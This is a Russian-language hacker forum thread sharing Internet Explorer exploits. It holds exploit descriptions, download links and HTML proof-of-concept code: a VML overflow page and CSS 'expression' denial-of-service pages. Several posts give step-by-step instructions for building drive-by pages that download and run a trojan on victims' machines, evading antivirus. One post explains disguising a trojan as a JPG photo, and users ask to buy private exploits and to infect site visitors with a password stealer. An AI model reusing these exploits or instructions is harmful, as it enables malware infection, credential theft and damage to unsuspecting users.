![]() |
Эксплойты для Ie
Этот раздел открыт для нахождений линков и эксплойтов против Ослика! Выкладываем только живые линки и сплойты! И еще сплойты выкладавать только в txt-формате!
------------------------------------------------------------------------ [IE «Window()» 0day exploit] Описание: Корпорация MicroSoft снова отличилась нестабильностью своих продуктов. На этот раз в public-источниках появился 0day эксплойт для Internet Explorer 6.0. Баг актуален для версий Win2k и WinXP со всеми сервиспаками. Суть ошибки состоит в простом переполнении буфера (а какие могут быть еще ошибки в продуктах MS?, которое вызывается через функцию window() языка JavaScript. Эксплойт состоит из 5 разных файлов. Стартовый HTML позволяет выбрать операционную систему. После клика по соответствующей ссылке незамедлительно запустится калькулятор. Учитывая, что шеллкод во вредоносном файле fillmem.htm можно легко изменить, эксплойт приравнивается к критическим Poc: 0day Про техническую реализацию уязвимости можно прочитать на ресурсе Цитата:
[IE "Msdds.dll" Remote Exploit] Описание: В прошлом обзоре я писал про Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit, однако сплоит работал не на всех версиях браузера. Недавно в паблик просочился код этого же сплоита, только функционирующего на WinXP+SP2 IE 6.0. Сам эксплойт написан на Перле и его задача - создать бажную HTML-страницу. В этой паге посредством object-тэга вызывается шелл-код, переполняющий буфер осла и оставляющий на память шелл на порту 28876. Правда, как это обычно бывает, в эксплойте есть маленькая недоделка. Знающий человек сразу догадается и исправит ошибку после первого неудачного запуска. А незнающий - пойдет лесом :). После исправления недочета, достаточно запустить сплоит с редиректом в страницу blah.html, а затем попытаться открыть загадочную HTML-страницу. Что будет дальше, ты, наверное, уже догадался Poc: Msdds (челы антивирь будет орать, говоря что это вирь! Это не так просто у сплойта сигнатура похожа на вирь!) Информацию по этой уязвимости можно найти здесь: Цитата:
[MS color management buffer overflow] Описание: За этот летний месяц вышло не так уж и много громких эксплойтов, однако некоторые багоискатели сумели наделать шума. Так, например, 21 июля некий хакер отыскал уязвимость в модуле Internet Explorer. Бажный плагин отвечает за подгрузку картинок на страницах ослика. Автор эксплойта утверждает, что баг содержится в функции GetColorProfileElement. Ошибка позволяет перезаписать стек определенным кодом. В сплойте содержится шеллкод для запуска блокнота. Но не все так хорошо, как написано в багтраке. Лично у меня не получилось запустить ноутпад, а максимум чего я добился — аварийного завершения работы браузера. Испытания проводились на чистой WinXP+SP2. Попробуй, быть может получится у тебя. Poc: MS_color ------------------------------------------------------------------------ [Microsoft MSHTA Script Execution] Описание: Опять Windows и опять Internet Explorer. На этот раз ошибка, найденная в ослике, позволяет запускать незарегистрированные типы файлов. Чтобы было понятнее, рассмотрим атаку на простом примере. Создается hta-файл, выполняющий какую-либо команду (смотри заголовок эксплойта). Затем запускается сам сплойт с двумя параметрами: путь к созданному hta-файлу и файл с незарегистрированным расширением (test.d0c, например). После всего вышеперечисленного, попробуй запустить созданный файл в эксплорере. Эта попытка увенчается успехом, а команда, вшитая в hta-шаблон будет мгновенно исполнена. Эксплойт ориентирован для Windows-среды, поэтому компилируй его с помощью lcc. В качестве команды, заданной в hta-файле может быть что угодно – от безобидного создания папки, до форматирования диска Poc: MSHTA Более подробное описание бага находится тут: Цитата:
[Internet Explorer Cursor Processing Remote DoS] Описание: Недавно мир узнал о новых уязвимостях в браузере Internet Explorer 6.0. На этот раз очередное переполнение позволяет перезагрузить операционную систему и в теории – выполнить любой код. Подробности ошибки не разглашаются, однако известно, что переполнение буфера вызывается при обработке неправильного *.ani-файла. Анимашка в нашем случае – это файл курсора, который умеет подгружать глупый ослик. Внедрение сокрушительного DoS’ера в html-файл происходит с помощью конструкции «body {CURSOR: url("ANIBLUE.ani")}». Сам ANIBLUE.ani, как правило, находится в той же папке. Как ты догадался, эта конструкция – есть описание стиля HTML-документа. Помимо глупой DoS-атаки, существует возможность выполнить любой код с правами текущего пользователя - на данный момент есть эксплойт, который открывает шелл на 28876 порту. Однако поставляемая версия пока не работоспособна, потому придется немного повременить. Poc: icoExp! А еще забыл сказаьб когда скачаете сплойт то про его сохоанить в HTML-формате! Нет это безапастно так вы просмотрите его содержимое! Просто там коментарий много! Сплойт безапасен! Отвечаю за свой базар! |
Сегодня дополню! Устал сильно! Прошу всех присоединится
|
оки... ждём
|
Прошу всем помочь!
|
ммм... понимаешь, KPOT_f!nd, эксплойты под IE (тем более рабочие) - весчь приватная.
Усли кого интересуют доступные эксплойты, советую скачать метасплойт и изучить: ie_createobject.pm ie_createtextrange.pm ie_iscomponentinstalled.pm ie_objecttype.pm ie_xp_pfv_metafile.pm |
Вот ещё:
http://security.nnov.ru/Gnews656.html |
2 эксплоита для пассивной XSS для браузера Internet Explorer методом обхода граффического фильтра.
http://www.kodsweb.ru/sploits/ie_xss_bypass_GUI.rar -GUI http://www.kodsweb.ru/sploits/ie_xss_bypass.rar -консольная from:http://www.kodsweb.ru/main.php |
мне бы ms05-027 качануть дето ,
пасиба -) |
Цитата:
_http://www.lan.krasu.ru/struct/net/security/index.asp?part=3 заплатки всякие |
раз тут уж такая тема , можт кто розкажет как пользоваться компилятором Faq , как компилировать а то я скачал
AfalinaSoft XL Report for C++Builder 4 4.1 build ссылка http://www.afalinasoft.com/files/xlr4btrial123.exe 8мб но вот провернуть никак не получается , кому не лень , кому ПЛЮС влепить ?? |
Цитата:
|
KPOT_f!nd
Если ты уж пишешь, то будь добр выкладывать источники http://www.xakep.ru/magazine/xa/085/077/1.asp Цитата:
Последний хитовый с пробивом SP2 на моей памяти был VML сплоит, четыре версии которого можно найти на milw0rm.com. Цитата:
ИМХО, начинать знакомство нужно именно с него. Больше вообще ничего не надо, пока проект жив. |
Я так понял под "приватностью" Elekt имел ввиду то что они чьи-то, т. е там уже все параметры заложены. Вот взять бы ie_xp_metafile.pm - эксплоит-то сам давно в баблике, а отдать готовый никому нельзя (всё равно будет на тебя работать). Т. е. надо его пересобирать конкретно под свои нужды (сплоит+начинка+их параметры). Ну а так вообщё-то прав SladerNon, 0day сплоиты, пока они не выложены на багтракх, а продаются за несколько K$ - они и есть приватные. (то есть не публичные). Поэтому сплоит, работающий тока на тебя (уже заряженный начинкой с параметрами), язык как-то не поворачивается назвать публичным. Вот пакет Метасплоит публичный, исходники сплоитов тоже, а на выходе получаем совсем личные сплоиты! (читай приватные) ГЫ!. Тут висят мои, ну и какие они? личные, публичные или приватные? Х .е. З. вообщем.
|
"Для закачки и запуска удалённого файла"
"Ani exploit" :D
Собирается он так: скачиваем ani-spl.exe запускаем с параметрами (ani-spl.exe name http:\\somesite\troy.exe) в результате получаем два файла - name.html и name.ani - код из name.html вставляем в любую страничку.. Необходимо чтобы с name.html в одной папке был и name.ani- он и скачает на комп жертвы troy.exe *недостатки: работает только с IE + *не работает в SP2 +абсолютно незаметен при запуске +можно вставить его в сайт с нормальным содержанием. AVP базы до 02.2005 не палит его По-моему (имхо) лучший сплоит для IE на сегодняшний день. :D Качаем нах... |
"Есть баг позволяющий запустить (*.exe) встроенный в картинку"
(платформа- Windows Explorer)
И так скачиваем ms04exp.zip 1. подменяем hеllo.exe своим трояном. 2. Запускаем jpg_gen.bat. 3. компилируем проект(CTRL+F9), должен появится файл jpg_gen.bin 4. переименовываем в jpg_gen.jpg При его запуске сначала наблюдается зависание. ПРИЧЕМ не надо открывать картинку достадочно лишь навести курсор ... и Троян сделает свое черное дело. *недостатки: не работает в SP 2 + легко выдать за свою фотку + появилось в базах AVP в 02.2005 т.е. :D Необновленный каспер не спасёт. |
А есть сплоиты для запуска pop-up или pop-exit окон, чтобы в SP2 не блокировались?
Был бы очень признателен. Если у кого есть приватный, то мог бы купить по сходной цене. ICQ 402136 |
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки проверки границ данных в Microsoft Vector Graphics Rendering (VML) библиотеке (vgx.dll) при обработке определенных VML документов. Удаленный пользователь может с помощью специально сформированного VML документа, содержащего слишком длинный метод fill внутри тега rect, вызвать переполнение стека и выполнить произвольный код на целевой системе. Примечание: уязвимость активно эксплуатируется в настоящее время. воздействие: отказ в обслуживании 20 сентября, 2006 <!-- Currently just a DoS EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX Shirkdog --> <html xmlns:v="urn:schemas-microsoft-com:vml"> <head> <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"> </object> <style> v\:* { behavior: url(#VMLRender); } </style> </head> <body> <v:rect style='width:120pt;height:80pt' fillcolor="red"> <v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAABCD01" angle="-45" focus="100%" focusposition=".5,.5" focussize="0,0" type="gradientRadial" /> </v:rect> </body> </html> # milw0rm.com [2006-09-19] источник инф: http://www.securitylab.ru/poc/274149.php А тут ie_vml_rectfill.pm - вполне рабочий сплоит от Metasploit Framework - проверял на SP2+IE6 (без патчей) |
Свежие баги в IE..
Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) Автор: José Carlos Nieto Jarquín Дата: Ср. 6 Дек. 2006 11:01 Tested under Windows XP SP2, MSIE 6.0.2900.2180 Exploit 1 <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(document.getElementById('foo').offsetWi dth+'px');"> <tr><td></td></tr> </table> </div> Exploit 2 <div style="width: expression(window.open(self.location));"> </div> Exploit 3 <html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+do cument.getElementById('foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html> |
Цитата:
P.S. Вставленные пробелы в длинных строках убрать естестевнно... |
Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009)
Это код эксплуатирует "ошибка двойного освобождения" в msado15.dll, в NextRecordset () функции. В результате двойного освобождения некоторой строки, возможна перезапись Управляющего блока Динамической памяти злонамеренным кодом. Методика эксплуатации основана на "Переотображении хранения". Выполняет calc.exe если успех. P.S. У меня просто свалил браузер IE. Код:
<HTML> |
Цитата:
у когонить есть соображения, как его сделать рабочим? или для запуска приложения через этот сплоит нужны еще какиенить условия? или надо отредактировать шелкод? |
Цитата:
Цитата:
|
Цитата:
Цитата:
|
rijy - тебе нужен сполойт чтобы запускал .exe файлы на строне жетрвы?. Если что стучи есть один =)
|
Цитата:
Нужен именно этот сплоит, чтоб запустил калькулятор (тот шеллкод, что зашит в нём). |
Свежак! 04/02/2007 Exploiting the ANI vulnerability on Vista (skape)
Эксплоит демонстрирует возможность выполнения произвольного кода из-за уязвимости в обработке Ani курсорчиков под винды. Детальная информация (на английском) тут:http://metasploit.com/ и тут: http://securityvulns.ru/files/ani_exp.htm Код:
<!--затеститься (на запуск калькулятора) |
http://www.conecc.org/add_link.php?cat=0
http://www.csnmonline.org/add_link.php?cat=0 В осле не открывать! Недавно в каталогах регил сайт и нашел забавный сплойт... И там и там тоже самое )) Честно говоря так и не расшифровал скрипт, кто подскажет что будет если цифры перевести в буквы? Вот еще: http://www.fullccacademy.org/ |
Ms Windows (.ani) Gdi Remote Elevation Of Privilege Exploit (ms07-017)
Цель: Microsoft Windows
Воздействие: Выполнение произвольного кода скачать эксплоит(архив) Код:
<html> |
Тройка сплоитов под Intenet Explorer. Как был дыряв, так и остался...
Взято с Милворма : MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027) IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit |
Цитата:
|
Microsoft Speech Api Activex Control Remote Bof Exploit (xp Sp2)
Цель: Microsoft Windows XP Воздействие: Выполнение произвольного кода MS07-033_expl2.htm Код:
<!-- |
Выполнение произвольного кода в Microsoft Internet Explorer.
Выполнение произвольного кода в Microsoft Internet Explorer
Версии: 6.x, 7.x Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в обработчике URL FirefoxURL в Осле на системах с установленой Лисой. Удаленный пользователь может с помощью специально сформированной Web страницы, при выполнении в ИЕ изменить путь к Mozilla Firefox и выполнить произвольный код на целевой системе. Пример: http://larholm.com/vuln/firefoxurl.html Код:
<html><body>Короче вариант рабочий, но только если у целевого пользователя стоит и Осел и Лиса. Имхо если так то врядли пользователь полезет на страницу через Осла. Но запостил т.к. все-таки уязвимость в IE. |
Как ваще пользоватся сплоитом?
Например : [Internet Explorer Cursor Processing Remote DoS] РАсскажите или снимите видео плиз, я ваще непойму как это ваще творится хочу научится! |
DirectX Media Remote Overflow DoS Exploit 2007-07-31
DirectX Media Remote Overflow DoS Exploit
Internet Explorer ver 6.0 Цитата:
|
Программа:
Microsoft Internet Explorer 7.x Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Web Edition Microsoft Windows XP Home Edition Microsoft Windows XP Professional Цитата:
PHP код:
|
Цитата:
|
А я давно её обнаружил когда еще фаерфокс 1.0.7 был ,только делал по другому вставлял редикт на .exe типа http://../../../../../1.exe
|
MS07-042 IE 6 XMLDOM substringData() DoS Exploit
Цель: Internet Explorer 6
Воздействие: Отказ в обслуживании Код:
<html> |
хип оверфлоу
хз че он делает :confused:
2007-09-05 GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit |
прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...
|
| Время: 02:11 |